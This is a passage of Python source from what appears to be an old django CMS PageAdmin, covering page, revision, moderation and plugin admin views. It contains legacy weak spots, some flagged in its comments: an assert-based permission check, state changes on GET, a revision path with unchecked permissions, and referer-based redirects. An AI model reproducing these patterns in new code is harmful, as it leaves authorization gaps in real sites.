        moderation_delete_request = (settings.CMS_MODERATOR and
            obj.pagemoderatorstate_set.get_delete_actions(
            ).count())

        #activate(user_lang_set)
        extra_context = {
            'placeholders': plugins.get_placeholders(selected_template),
            'page': obj,
            'CMS_PERMISSION': settings.CMS_PERMISSION,
            'CMS_MODERATOR': settings.CMS_MODERATOR,
            'ADMIN_MEDIA_URL': settings.ADMIN_MEDIA_PREFIX,
            'has_change_permissions_permission': obj.has_change_permissions_permission(request),
            'has_moderate_permission': obj.has_moderate_permission(request),
            'moderation_level': moderation_level,
            'moderation_required': moderation_required,
            'moderator_should_approve': moderator.moderator_should_approve(request, obj),
            'moderation_delete_request': moderation_delete_request,
            'show_delete_translation': len(obj.get_languages()) > 1,
            'current_site_id': settings.SITE_ID,
        }
        extra_context = self.update_language_tab_context(request, obj, extra_context)
    tab_language = request.GET.get("language", None)
    response = super(PageAdmin, self).change_view(request, object_id, extra_context)

    # preserve the selected language tab on the redirect after saving
    # NOTE(review): reaches into the private ``response._headers`` dict
    if tab_language and response.status_code == 302 and response._headers['location'][1] == request.path :
        location = response._headers['location']
        response._headers['location'] = (location[0], "%s?language=%s" % (location[1], tab_language))
    return response
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
    """
    Inject 'filled_languages' into the template context: the languages for
    which the page already has a non-empty title, limited to the languages
    allowed for the page's site.
    """
    filled = []
    if obj:
        title_rows = obj.title_set.filter(title__isnull=False).values_list('language')
        filled = [row[0] for row in title_rows]
    allowed = [lang[0] for lang in self._get_site_languages(obj)]
    context.update({
        'filled_languages': [code for code in filled if code in allowed],
    })
    return super(PageAdmin, self).render_change_form(request, context, add, change, form_url, obj)
def _get_site_languages(self, obj):
    """
    Return the (code, label) language pairs available for *obj*'s site,
    falling back to the global CMS_LANGUAGES when the site has no
    per-site language configuration.
    """
    site_id = obj.site_id if obj else None
    per_site = settings.CMS_SITE_LANGUAGES
    if site_id and site_id in per_site:
        # label lookup: CMS_LANGUAGES first, then LANGUAGES, then the code
        cms_labels = dict(settings.CMS_LANGUAGES)
        global_labels = dict(settings.LANGUAGES)
        return [
            (code, cms_labels.get(code, global_labels.get(code, code)))
            for code in per_site[site_id]
        ]
    return settings.CMS_LANGUAGES
def update_language_tab_context(self, request, obj, context=None):
    """
    Add the current language and the language-tab configuration for *obj*'s
    site to *context* (creating the dict if needed) and return it.
    """
    context = context or {}
    current_language = get_language_from_request(request, obj)
    tabs = self._get_site_languages(obj)
    context.update({
        'language': current_language,
        'language_tabs': tabs,
        'show_language_tabs': len(tabs) > 1,
    })
    return context
def response_change(self, request, obj):
    """
    Called after every successful page change. Under moderation the page is
    saved once more so that changes collected from related objects get
    published if required, then the standard redirect is returned.
    """
    if settings.CMS_MODERATOR:
        # re-save so all related page-model changes can be published
        obj.save()
    return super(PageAdmin, self).response_change(request, obj)
def has_add_permission(self, request):
    """
    Return true if the current user has permission to add a new page.

    Delegates to the CMS permission system when CMS_PERMISSION is on,
    otherwise to Django's standard model permission check.
    """
    if not settings.CMS_PERMISSION:
        return super(PageAdmin, self).has_add_permission(request)
    return permissions.has_page_add_permission(request)
def has_change_permission(self, request, obj=None):
    """
    Return true if the current user has permission on the page.
    Return the string 'All' if the user has all rights.

    With CMS_PERMISSION on, per-object checks go to the page itself and
    the general check to the CMS permission helpers; otherwise Django's
    standard model permission check applies.
    """
    if settings.CMS_PERMISSION:
        if obj:
            return obj.has_change_permission(request)
        return permissions.has_page_change_permission(request)
    return super(PageAdmin, self).has_change_permission(request, obj)
def has_delete_permission(self, request, obj=None):
    """
    Returns True if the given request has permission to delete the given
    Page instance. When CMS_PERMISSION is enabled and a concrete page is
    supplied, the page's own object-level check decides; in every other
    case Django's standard model permission check applies.
    """
    use_object_check = settings.CMS_PERMISSION and obj is not None
    if use_object_check:
        return obj.has_delete_permission(request)
    return super(PageAdmin, self).has_delete_permission(request, obj)
def has_recover_permission(self, request):
    """
    Returns True if the user has the right to recover (undelete) pages.

    Requires django-reversion to be installed; superusers may always
    recover, other users need a GlobalPagePermission row with
    ``can_recover`` set.
    """
    if not "reversion" in settings.INSTALLED_APPS:
        return False
    user = request.user
    if user.is_superuser:
        return True
    try:
        perm = GlobalPagePermission.objects.get(user=user)
    except ObjectDoesNotExist:
        # no global permission record for this user
        return False
    except Exception:
        # BUGFIX: was a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit). Keep the original best-effort
        # behavior for other errors (e.g. multiple permission rows):
        # deny recovery rather than crash the admin.
        return False
    return bool(perm.can_recover)
def changelist_view(self, request, extra_context=None):
    "The 'change list' admin view for this model."
    from django.contrib.admin.views.main import ERROR_FLAG
    opts = self.model._meta
    app_label = opts.app_label
    if not self.has_change_permission(request, None):
        raise PermissionDenied
    try:
        # CMSChangeList's constructor signature follows ChangeList's, which
        # grew a list_editable argument in Django 1.1 — sniff for it.
        if hasattr(self, 'list_editable'):# django 1.1
            cl = CMSChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
                self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self.list_editable, self)
        else:# django 1.0.2
            cl = CMSChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
                self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self)
    except IncorrectLookupParameters:
        # Wacky lookup parameters were given, so redirect to the main
        # changelist page, without parameters, and pass an 'invalid=1'
        # parameter via the query string. If wacky parameters were given and
        # the 'invalid=1' parameter was already in the query string, something
        # is screwed up with the database, so display an error page.
        if ERROR_FLAG in request.GET.keys():
            return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})
        return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
    cl.set_items(request)

    # site filter: explicit ?site__exact=... or the current site
    site_id = request.GET.get('site__exact', None)
    if site_id is None:
        site_id = Site.objects.get_current().pk
    site_id = int(site_id)

    # languages
    languages = []
    if site_id and site_id in settings.CMS_SITE_LANGUAGES:
        languages = settings.CMS_SITE_LANGUAGES[site_id]
    else:
        languages = [x[0] for x in settings.CMS_LANGUAGES]

    context = {
        'title': cl.title,
        'is_popup': cl.is_popup,
        'cl': cl,
        'opts':opts,
        'has_add_permission': self.has_add_permission(request),
        'root_path': self.admin_site.root_path,
        'app_label': app_label,
        'CMS_MEDIA_URL': settings.CMS_MEDIA_URL,
        'softroot': settings.CMS_SOFTROOT,
        'CMS_PERMISSION': settings.CMS_PERMISSION,
        'CMS_MODERATOR': settings.CMS_MODERATOR,
        'has_recover_permission': 'reversion' in settings.INSTALLED_APPS and self.has_recover_permission(request),
        'DEBUG': settings.DEBUG,
        'site_languages': languages,
    }
    if 'reversion' in settings.INSTALLED_APPS:
        # reversion's changelist template expects this extra flag
        context['has_change_permission'] = self.has_change_permission(request)
    context.update(extra_context or {})
    return render_to_response(self.change_list_template or [
        'admin/%s/%s/change_list.html' % (app_label, opts.object_name.lower()),
        'admin/%s/change_list.html' % app_label,
        'admin/change_list.html'
    ], context, context_instance=RequestContext(request))
def recoverlist_view(self, request, extra_context=None):
    """Reversion's deleted-pages list, gated by the recover permission."""
    if self.has_recover_permission(request):
        return super(PageAdmin, self).recoverlist_view(request, extra_context)
    raise PermissionDenied
def recover_view(self, request, version_id, extra_context=None):
    """Reversion's recover (undelete) form, gated by the recover
    permission, with the language tabs added to the context."""
    if not self.has_recover_permission(request):
        raise PermissionDenied
    tab_context = self.update_language_tab_context(request, None, extra_context)
    return super(PageAdmin, self).recover_view(request, version_id, tab_context)
def revision_view(self, request, object_id, version_id, extra_context=None):
    """Reversion's single-revision form, gated by change permission on the
    page, with the language tabs added to the context."""
    page = Page.objects.get(pk=object_id)
    if not self.has_change_permission(request, page):
        raise PermissionDenied
    tab_context = self.update_language_tab_context(request, None, extra_context)
    return super(PageAdmin, self).revision_view(request, object_id, version_id, tab_context)
def history_view(self, request, object_id, extra_context=None):
    """The page's revision history list, gated by change permission on the
    page, with the language tabs added to the context."""
    page = Page.objects.get(pk=object_id)
    if not self.has_change_permission(request, page):
        raise PermissionDenied
    tab_context = self.update_language_tab_context(request, None, extra_context)
    return super(PageAdmin, self).history_view(request, object_id, tab_context)
def render_revision_form(self, request, obj, version, context, revert=False, recover=False):
    """
    Reversion hook: sanity-check the serialized parent reference before
    rendering the revert/recover form, and attach the version to the page
    so save_model() can restore the revision's plugins.
    """
    # reset parent to null if parent is not found
    if version.field_dict['parent']:
        try:
            Page.objects.get(pk=version.field_dict['parent'])
        except (ObjectDoesNotExist, ValueError):
            # BUGFIX: was a bare ``except:``; narrowed to the lookup
            # failures this guard is for (missing page / malformed pk).
            if revert and obj.parent_id != int(version.field_dict['parent']):
                # reverting under a vanished parent: keep the current one
                version.field_dict['parent'] = obj.parent_id
            if recover:
                # recovering with a vanished parent: recover as a root page
                obj.parent = None
                obj.parent_id = None
                version.field_dict['parent'] = None

    obj.version = version

    return super(PageAdmin, self).render_revision_form(request, obj, version, context, revert, recover)
@transaction.commit_on_success
def move_page(self, request, page_id, extra_context=None):
    """
    Move the page to the requested target, at the given position

    AJAX view: expects POST['target'] (destination page pk) and
    POST['position']; re-renders the moved tree item on success.
    """
    target = request.POST.get('target', None)
    position = request.POST.get('position', None)
    if target is None or position is None:
        return HttpResponseRedirect('../../')

    try:
        page = self.model.objects.get(pk=page_id)
        target = self.model.objects.get(pk=target)
    except self.model.DoesNotExist:
        return HttpResponseBadRequest("error")

    # does he haves permissions to do this...?
    if not page.has_move_page_permission(request) or \
        not target.has_add_permission(request):
            return HttpResponseForbidden("Denied")

    # move page
    page.move_page(target, position)
    if "reversion" in settings.INSTALLED_APPS:
        # record the move as a revision
        helpers.make_revision_with_plugins(page)
    return admin_utils.render_admin_menu_item(request, page)
def get_permissions(self, request, page_id):
    """
    Render the permissions overview table for a page: all global and
    per-page permissions, each annotated with (is_global, user_may_edit).
    """
    page = get_object_or_404(Page, id=page_id)

    can_change_list = Page.permissions.get_change_id_list(request.user, page.site_id)
    global_perms = GlobalPagePermission.objects.filter(sites__in=[page.site_id])
    page_perms = PagePermission.objects.for_page(page)

    # may the requesting user edit global permissions at all?
    has_global = bool(permissions.has_global_change_permissions_permission(request.user))
    grant_all = can_change_list == PagePermissionsPermissionManager.GRANT_ALL

    permission_set = []
    for permission in list(global_perms) + list(page_perms):
        if isinstance(permission, GlobalPagePermission):
            permission_set.append([(True, has_global), permission])
        else:
            can_change = grant_all or permission.page_id in can_change_list
            permission_set.append([(False, can_change), permission])

    context = {
        'page': page,
        'permission_set': permission_set,
    }
    return render_to_response('admin/cms/page/permissions.html', context)
@transaction.commit_on_success
def copy_page(self, request, page_id, extra_context=None):
    """
    Copy the page and all its plugins and descendants to the requested target, at the given position

    AJAX view: expects POST['target'], POST['position'] and POST['site'];
    returns plain "ok"/"error". Falls back to a redirect when the required
    parameters are missing.
    """
    context = {}
    page = Page.objects.get(pk=page_id)

    target = request.POST.get('target', None)
    position = request.POST.get('position', None)
    site = request.POST.get('site', None)
    if target is not None and position is not None and site is not None:
        try:
            target = self.model.objects.get(pk=target)
            # does he have permissions to copy this page under target?
            # NOTE(review): assert is stripped under ``python -O``, which
            # would silently skip this permission check
            assert target.has_add_permission(request)
            site = Site.objects.get(pk=site)
        except (ObjectDoesNotExist, AssertionError):
            return HttpResponse("error")
            #context.update({'error': _('Page could not been moved.')})
        else:
            kwargs = {
                'copy_permissions': request.REQUEST.get('copy_permissions', False),
                'copy_moderation': request.REQUEST.get('copy_moderation', False),
            }
            page.copy_page(target, site, position, **kwargs)
            return HttpResponse("ok")
    context.update(extra_context or {})
    return HttpResponseRedirect('../../')
def get_moderation_states(self, request, page_id):
    """Render the moderation messages for a page.

    Loaded over ajax into the inline-group element of the change form view.
    """
    page = get_object_or_404(Page, id=page_id)
    if not page.has_moderate_permission(request):
        raise Http404()
    return render_to_response(
        'admin/cms/page/moderation_messages.html',
        {'page': page},
    )
@transaction.commit_on_success
def approve_page(self, request, page_id):
    """Approve changes on current page by user from request.
    """
    #TODO: change to POST method !! get is not safe
    page = get_object_or_404(Page, id=page_id)
    if not page.has_moderate_permission(request):
        raise Http404()
    moderator.approve_page(request, page)
    # Django SQLite bug. Does not convert to string the lazy instances
    from django.utils.translation import ugettext as _
    self.message_user(request, _('Page was successfully approved.'))
    if 'node' in request.REQUEST:
        # if request comes from tree..
        return admin_utils.render_admin_menu_item(request, page)
    referer = request.META.get('HTTP_REFERER', reverse('admin:cms_page_changelist'))
    path = '../../'
    # Requests originating outside the admin go back to the frontend with
    # edit mode switched off.
    if 'admin' not in referer:
        path = '%s?edit-off' % referer.split('?')[0]
    return HttpResponseRedirect( path )
@transaction.commit_on_success
def publish_page(self, request, page_id):
    """Publish a page and redirect back to where the user came from."""
    page = get_object_or_404(Page, id=page_id)
    # ensure user has permissions to publish this page
    if not page.has_moderate_permission(request):
        return HttpResponseForbidden("Denied")
    page.publish()
    referer = request.META.get('HTTP_REFERER', '')
    # TODO: use admin base here!
    if 'admin' in referer:
        redirect_to = '../../'
    else:
        # Came from the frontend: return there with edit mode off.
        redirect_to = '%s?edit-off' % referer.split('?')[0]
    return HttpResponseRedirect(redirect_to)
def delete_view(self, request, object_id, *args, **kwargs):
    """If page is under moderation, just mark this page for deletion = add
    delete action to page states; otherwise fall through to the standard
    admin delete flow.
    """
    page = get_object_or_404(Page, id=object_id)
    if not self.has_delete_permission(request, page):
        raise PermissionDenied
    if settings.CMS_MODERATOR and page.is_under_moderation():
        # don't perform a delete action, just mark page for deletion
        page.force_moderation_action = PageModeratorState.ACTION_DELETE
        page.moderator_state = Page.MODERATOR_NEED_DELETE_APPROVEMENT
        page.save()
        if not self.has_change_permission(request, None):
            return HttpResponseRedirect("../../../../")
        return HttpResponseRedirect("../../")
    # Not moderated: delegate to the regular ModelAdmin delete view.
    response = super(PageAdmin, self).delete_view(request, object_id, *args, **kwargs)
    return response
@create_on_success
def delete_translation(self, request, object_id, extra_context=None):
    """Delete a single language translation (Title + its plugins) of a page.

    Mirrors the standard admin delete-confirmation flow: collect the
    objects that would be deleted, check permissions, show a confirmation
    page on GET and perform the deletion on POST.
    """
    language = get_language_from_request(request)
    opts = Page._meta
    titleopts = Title._meta
    app_label = titleopts.app_label
    pluginopts = CMSPlugin._meta
    try:
        obj = self.queryset(request).get(pk=unquote(object_id))
    except self.model.DoesNotExist:
        # Don't raise Http404 just yet, because we haven't checked
        # permissions yet. We don't want an unauthenticated user to be able
        # to determine whether a given object exists.
        obj = None
    if not self.has_delete_permission(request, obj):
        raise PermissionDenied
    if obj is None:
        raise Http404(
            _('%(name)s object with primary key %(key)r does not exist.') % {
                'name': force_unicode(opts.verbose_name),
                'key': escape(object_id)
            })
    # Refuse to delete the last remaining translation of the page.
    if not len(obj.get_languages()) > 1:
        raise Http404(_('There only exists one translation for this page'))
    titleobj = get_object_or_404(Title, page__id=object_id, language=language)
    saved_plugins = CMSPlugin.objects.filter(placeholder__page__id=object_id, language=language)
    if django.VERSION[1] > 2: # pragma: no cover
        # WARNING: Django 1.3 is not officially supported yet!
        # Django >= 1.3's get_deleted_objects() requires a 'using' db alias.
        using = router.db_for_read(self.model)
        kwargs = {
            'admin_site': self.admin_site,
            'user': request.user,
            'using': using
        }
    else:
        kwargs = {
            'admin_site': self.admin_site,
            'user': request.user,
        }
    deleted_objects, perms_needed = get_deleted_objects(
        [titleobj],
        titleopts,
        **kwargs
    )[:2]
    to_delete_plugins, perms_needed_plugins = get_deleted_objects(
        saved_plugins,
        pluginopts,
        **kwargs
    )[:2]
    deleted_objects.append(to_delete_plugins)
    perms_needed = set( list(perms_needed) + list(perms_needed_plugins) )
    if request.method == 'POST':
        if perms_needed:
            raise PermissionDenied
        message = _('Title and plugins with language %(language)s was deleted') % {
            'language': [name for code, name in settings.CMS_LANGUAGES if code == language][0]
        }
        self.log_change(request, titleobj, message)
        self.message_user(request, message)
        titleobj.delete()
        for p in saved_plugins:
            p.delete()
        public = obj.publisher_public
        if public:
            # Re-save the public counterpart so its state is refreshed.
            public.save()
        if "reversion" in settings.INSTALLED_APPS:
            helpers.make_revision_with_plugins(obj)
        if not self.has_change_permission(request, None):
            return HttpResponseRedirect("../../../../")
        return HttpResponseRedirect("../../")
    # GET: render the confirmation page.
    context = {
        "title": _("Are you sure?"),
        "object_name": force_unicode(titleopts.verbose_name),
        "object": titleobj,
        "deleted_objects": deleted_objects,
        "perms_lacking": perms_needed,
        "opts": titleopts,
        "root_path": self.admin_site.root_path,
        "app_label": app_label,
    }
    context.update(extra_context or {})
    context_instance = template.RequestContext(request, current_app=self.admin_site.name)
    return render_to_response(self.delete_confirmation_template or [
        "admin/%s/%s/delete_confirmation.html" % (app_label, titleopts.object_name.lower()),
        "admin/%s/delete_confirmation.html" % app_label,
        "admin/delete_confirmation.html"
    ], context, context_instance=context_instance)
def remove_delete_state(self, request, object_id):
    """Remove all delete actions from page states; requires change permission."""
    page = get_object_or_404(Page, id=object_id)
    if not self.has_change_permission(request, page):
        raise PermissionDenied
    # Drop every pending delete action, then push the page back into the
    # "needs approval" moderation state.
    page.pagemoderatorstate_set.get_delete_actions().delete()
    page.moderator_state = Page.MODERATOR_NEED_APPROVEMENT
    page.save()
    return HttpResponseRedirect("../../%d/" % page.id)
def preview_page(self, request, object_id):
    """Redirect to a preview of either the draft or the public version."""
    page = get_object_or_404(Page, id=object_id)
    if request.REQUEST.get('public', None):
        # Preview the published counterpart; it must exist.
        if not page.publisher_public_id:
            raise Http404
        page = page.publisher_public
        attrs = "?preview=1"
    else:
        attrs = "?preview=1" + "&draft=1"
    url = page.get_absolute_url() + attrs
    current_site = Site.objects.get_current()
    if page.site != current_site:
        # Cross-site preview: build an absolute URL on the page's own domain.
        scheme = 'https' if request.is_secure() else 'http'
        url = "%s://%s%s" % (scheme, page.site.domain, url)
    return HttpResponseRedirect(url)
def change_status(self, request, page_id):
    """
    Switch the published status of a page (POST only).

    Returns the re-rendered tree menu item on success, 403 when the user
    lacks publish permission, and 405 for non-POST requests.
    """
    if request.method != 'POST':
        # Bug fix: the original returned the HttpResponseNotAllowed *class*
        # instead of an instance; the constructor requires the list of
        # permitted methods.
        return HttpResponseNotAllowed(['POST'])
    page = get_object_or_404(Page, pk=page_id)
    if page.has_publish_permission(request):
        page.published = not page.published
        page.save()
        return admin_utils.render_admin_menu_item(request, page)
    return HttpResponseForbidden(unicode(_("You do not have permission to publish this page")))
def change_innavigation(self, request, page_id):
    """
    Toggle the in_navigation flag of a page (POST only).

    Returns the re-rendered tree menu item on success, 403 when the user
    lacks change permission, and 405 for non-POST requests.
    """
    # why require post and still have page id in the URL???
    if request.method != 'POST':
        # Bug fix: instantiate HttpResponseNotAllowed with the allowed
        # methods instead of returning the bare class.
        return HttpResponseNotAllowed(['POST'])
    page = get_object_or_404(Page, pk=page_id)
    if page.has_change_permission(request):
        page.in_navigation = not page.in_navigation
        page.save(force_state=Page.MODERATOR_NEED_APPROVEMENT)
        return admin_utils.render_admin_menu_item(request, page)
    return HttpResponseForbidden(_("You do not have permission to change this page's in_navigation status"))
@create_on_success
def add_plugin(self, request):
    '''
    Could be either a page or a parent - if it's a parent we get the page via parent.

    POST-only ajax endpoint; responds with the new plugin's pk as plain
    text, or an error response.
    '''
    # Never allow adding plugins while viewing history / recovering revisions.
    if 'history' in request.path or 'recover' in request.path:
        return HttpResponse(str("error"))
    if request.method != "POST":
        raise Http404
    plugin_type = request.POST['plugin_type']
    if not has_plugin_permission(request.user, plugin_type, "add"):
        return HttpResponseForbidden(ugettext('You have no permission to add a plugin'))
    placeholder_id = request.POST.get('placeholder', None)
    parent_id = request.POST.get('parent_id', None)
    if placeholder_id:
        placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
        page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
    else:
        placeholder = None
        page = None
    parent = None
    # page add-plugin
    if page:
        language = request.POST['language'] or get_language_from_request(request)
        # Positions are 0-based, so the current count is the next position.
        position = CMSPlugin.objects.filter(language=language, placeholder=placeholder).count()
        limits = placeholder_utils.get_placeholder_conf("limits", placeholder.slot, page.get_template())
        if limits:
            global_limit = limits.get("global")
            type_limit = limits.get(plugin_type)
            if global_limit and position >= global_limit:
                return HttpResponseBadRequest("This placeholder already has the maximum number of plugins")
            elif type_limit:
                type_count = CMSPlugin.objects.filter(language=language, placeholder=placeholder, plugin_type=plugin_type).count()
                if type_count >= type_limit:
                    plugin_name = unicode(plugin_pool.get_plugin(plugin_type).name)
                    return HttpResponseBadRequest("This placeholder already has the maximum number allowed of %s plugins." % plugin_name)
    # in-plugin add-plugin
    elif parent_id:
        parent = get_object_or_404(CMSPlugin, pk=parent_id)
        placeholder = parent.placeholder
        page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
        if not page: # Make sure we do have a page
            raise Http404
        language = parent.language
        position = None
    # placeholder (non-page) add-plugin
    else:
        # do NOT allow non-page placeholders to use this method, they
        # should use their respective admin!
        raise Http404
    if not page.has_change_permission(request):
        # we raise a 404 instead of 403 for a slightly improved security
        # and to be consistent with placeholder admin
        raise Http404
    # Sanity check to make sure we're not getting bogus values from JavaScript:
    if not language or not language in [ l[0] for l in settings.LANGUAGES ]:
        return HttpResponseBadRequest(ugettext("Language must be set to a supported language!"))
    plugin = CMSPlugin(language=language, plugin_type=plugin_type, position=position, placeholder=placeholder)
    if parent:
        plugin.parent = parent
    plugin.save()
    if 'reversion' in settings.INSTALLED_APPS and page:
        # Record a revision describing the plugin addition.
        helpers.make_revision_with_plugins(page)
        reversion.revision.user = request.user
        plugin_name = unicode(plugin_pool.get_plugin(plugin_type).name)
        reversion.revision.comment = unicode(_(u"%(plugin_name)s plugin added to %(placeholder)s") % {'plugin_name':plugin_name, 'placeholder':placeholder})
    return HttpResponse(str(plugin.pk))
@create_on_success
@transaction.commit_on_success
def copy_plugins(self, request):
    """Copy every plugin of one language into another language of the same
    placeholder, then render the refreshed plugin list (ajax helper).
    """
    if 'history' in request.path or 'recover' in request.path:
        return HttpResponse(str("error"))
    if request.method != "POST":
        raise Http404
    copy_from = request.POST['copy_from']
    placeholder_id = request.POST['placeholder']
    placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
    page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
    language = request.POST['language'] or get_language_from_request(request)
    if not page.has_change_permission(request):
        return HttpResponseForbidden(ugettext("You do not have permission to change this page"))
    if not language or not language in [ l[0] for l in settings.CMS_LANGUAGES ]:
        return HttpResponseBadRequest(ugettext("Language must be set to a supported language!"))
    if language == copy_from:
        return HttpResponseBadRequest(ugettext("Language must be different than the copied language!"))
    plugins = list(placeholder.cmsplugin_set.filter(language=copy_from).order_by('tree_id', '-rght'))
    # check permissions before copy the plugins:
    for plugin in plugins:
        if not has_plugin_permission(request.user, plugin.plugin_type, "add"):
            return HttpResponseForbidden(ugettext("You do not have permission to add plugins"))
    # NOTE: 'copy_plugins' here resolves to the module-level import of the
    # same name, not to this method.
    copy_plugins.copy_plugins_to(plugins, placeholder, language)
    if page and "reversion" in settings.INSTALLED_APPS:
        helpers.make_revision_with_plugins(page)
        reversion.revision.user = request.user
        reversion.revision.comment = _(u"Copied %(language)s plugins to %(placeholder)s") % {'language':dict(settings.LANGUAGES)[language], 'placeholder':placeholder}
    plugin_list = CMSPlugin.objects.filter(language=language, placeholder=placeholder, parent=None).order_by('position')
    return render_to_response('admin/cms/page/widgets/plugin_item.html', {'plugin_list':plugin_list}, RequestContext(request))
@create_on_success
def edit_plugin(self, request, plugin_id):
    """Add/change view dispatcher for a single plugin.

    Handles both the normal edit flow and the read-only rendering of a
    plugin as stored in a reversion history/recover revision.
    """
    plugin_id = int(plugin_id)
    if not 'history' in request.path and not 'recover' in request.path:
        # Normal (non-history) edit: work on the live plugin.
        cms_plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
        page = placeholder_utils.get_page_from_placeholder_if_exists(cms_plugin.placeholder)
        instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
        if page and not page.has_change_permission(request):
            return HttpResponseForbidden(ugettext("You have no permission to change this page"))
    else:
        # history view with reversion
        from reversion.models import Version
        pre_edit = request.path.split("/edit-plugin/")[0]
        version_id = pre_edit.split("/")[-1]
        # NOTE(review): this lookup appears redundant -- get_object_or_404
        # below fetches the same Version again. Candidate for removal.
        Version.objects.get(pk=version_id)
        version = get_object_or_404(Version, pk=version_id)
        rev_objs = []
        for related_version in version.revision.version_set.all():
            try:
                rev = related_version.object_version
            except models.FieldDoesNotExist:
                # A model field changed since the revision was taken; skip it.
                continue
            else:
                rev_objs.append(rev.object)
        # TODO: check permissions
        for obj in rev_objs:
            if obj.__class__ == CMSPlugin and obj.pk == plugin_id:
                cms_plugin = obj
                break
        inst, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
        instance = None
        if cms_plugin.get_plugin_class().model == CMSPlugin:
            instance = cms_plugin
        else:
            # Find the concrete plugin instance in the revision by its
            # pointer back to the base CMSPlugin row.
            for obj in rev_objs:
                if hasattr(obj, "cmsplugin_ptr_id") and int(obj.cmsplugin_ptr_id) == int(cms_plugin.pk):
                    instance = obj
                    break
        if not instance:
            raise Http404("This plugin is not saved in a revision")
    if not has_plugin_permission(request.user, cms_plugin.plugin_type, "change"):
        return HttpResponseForbidden(ugettext("You have no permission to edit a plugin"))
    plugin_admin.cms_plugin_instance = cms_plugin
    try:
        plugin_admin.placeholder = cms_plugin.placeholder # TODO: what for reversion..? should it be inst ...?
    except Placeholder.DoesNotExist:
        pass
    if request.method == "POST":
        # set the continue flag, otherwise will plugin_admin make redirect to list
        # view, which actually does'nt exists
        request.POST['_continue'] = True
    if 'reversion' in settings.INSTALLED_APPS and ('history' in request.path or 'recover' in request.path):
        # in case of looking to history just render the plugin content
        context = RequestContext(request)
        return render_to_response(plugin_admin.render_template, plugin_admin.render(context, instance, plugin_admin.placeholder))
    if not instance:
        # instance doesn't exist, call add view
        response = plugin_admin.add_view(request)
    else:
        # already saved before, call change view
        # we actually have the instance here, but since i won't override
        # change_view method, is better if it will be loaded again, so
        # just pass id to plugin_admin
        response = plugin_admin.change_view(request, str(plugin_id))
    if request.method == "POST" and plugin_admin.object_successfully_changed:
        # if reversion is installed, save version of the page plugins
        if 'reversion' in settings.INSTALLED_APPS and page:
            helpers.make_revision_with_plugins(page)
            reversion.revision.user = request.user
            plugin_name = unicode(plugin_pool.get_plugin(cms_plugin.plugin_type).name)
            reversion.revision.comment = ugettext(u"%(plugin_name)s plugin edited at position %(position)s in %(placeholder)s") % {
                'plugin_name': plugin_name,
                'position': cms_plugin.position,
                'placeholder': cms_plugin.placeholder.slot
            }
        # read the saved object from plugin_admin - ugly but works
        saved_object = plugin_admin.saved_object
        context = {
            'CMS_MEDIA_URL': settings.CMS_MEDIA_URL,
            'plugin': saved_object,
            'is_popup': True,
            'name': unicode(saved_object),
            "type": saved_object.get_plugin_name(),
            'plugin_id': plugin_id,
            'icon': force_escape(escapejs(saved_object.get_instance_icon_src())),
            'alt': force_escape(escapejs(saved_object.get_instance_icon_alt())),
        }
        return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
    return response
@create_on_success
def move_plugin(self, request):
    """Move and/or reorder plugins (POST-only ajax endpoint).

    'plugin_id' + 'placeholder' move a single plugin to the end of another
    placeholder; 'ids' (underscore-separated pks) assigns sequential
    positions in the given order. Responds with plain "ok"/"error".
    """
    if request.method != "POST":
        return HttpResponse(str("error"))
    if 'history' in request.path:
        return HttpResponse(str("error"))
    pos = 0
    page = None
    success = False
    if 'plugin_id' in request.POST:
        plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
        if not has_plugin_permission(request.user, plugin.plugin_type, "change"):
            return HttpResponseForbidden()
        page = plugins.get_page_from_plugin_or_404(plugin)
        if not page.has_change_permission(request):
            return HttpResponseForbidden(ugettext("You have no permission to change this page"))
        placeholder_slot = request.POST['placeholder']
        placeholders = plugins.get_placeholders(page.get_template())
        # Target slot must exist in the page's template.
        if not placeholder_slot in placeholders:
            return HttpResponse(str("error"))
        placeholder = page.placeholders.get(slot=placeholder_slot)
        plugin.placeholder = placeholder
        # plugin positions are 0 based, so just using count here should give us 'last_position + 1'
        position = CMSPlugin.objects.filter(placeholder=placeholder).count()
        plugin.position = position
        plugin.save()
        success = True
    if 'ids' in request.POST:
        # Reorder: assign sequential positions in the order given.
        for plugin_id in request.POST['ids'].split("_"):
            plugin = CMSPlugin.objects.get(pk=plugin_id)
            if not has_plugin_permission(request.user, plugin.plugin_type, "change"):
                return HttpResponseForbidden(ugettext("You have no permission to move a plugin"))
            page = placeholder_utils.get_page_from_placeholder_if_exists(plugin.placeholder)
            if not page: # use placeholderadmin instead!
                raise Http404
            if not page.has_change_permission(request):
                return HttpResponseForbidden(ugettext("You have no permission to change this page"))
            if plugin.position != pos:
                plugin.position = pos
                plugin.save()
            pos += 1
        success = True
    if not success:
        return HttpResponse(str("error"))
    if page and 'reversion' in settings.INSTALLED_APPS:
        helpers.make_revision_with_plugins(page)
        reversion.revision.user = request.user
        reversion.revision.comment = ugettext(u"Plugins where moved")
    return HttpResponse(str("ok"))
@create_on_success
def remove_plugin(self, request):
    """Delete a plugin (POST var 'plugin_id').

    Under moderation only the draft plugin is deleted and the page is
    marked as needing approval; otherwise the public copy is removed too.
    Responds with "<plugin_id>,<comment>" for the tree-view JavaScript.
    """
    if request.method != "POST":
        raise Http404
    if 'history' in request.path:
        raise Http404
    plugin_id = request.POST['plugin_id']
    plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
    if not has_plugin_permission(request.user, plugin.plugin_type, "delete"):
        return HttpResponseForbidden(ugettext("You have no permission to remove a plugin"))
    placeholder = plugin.placeholder
    page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
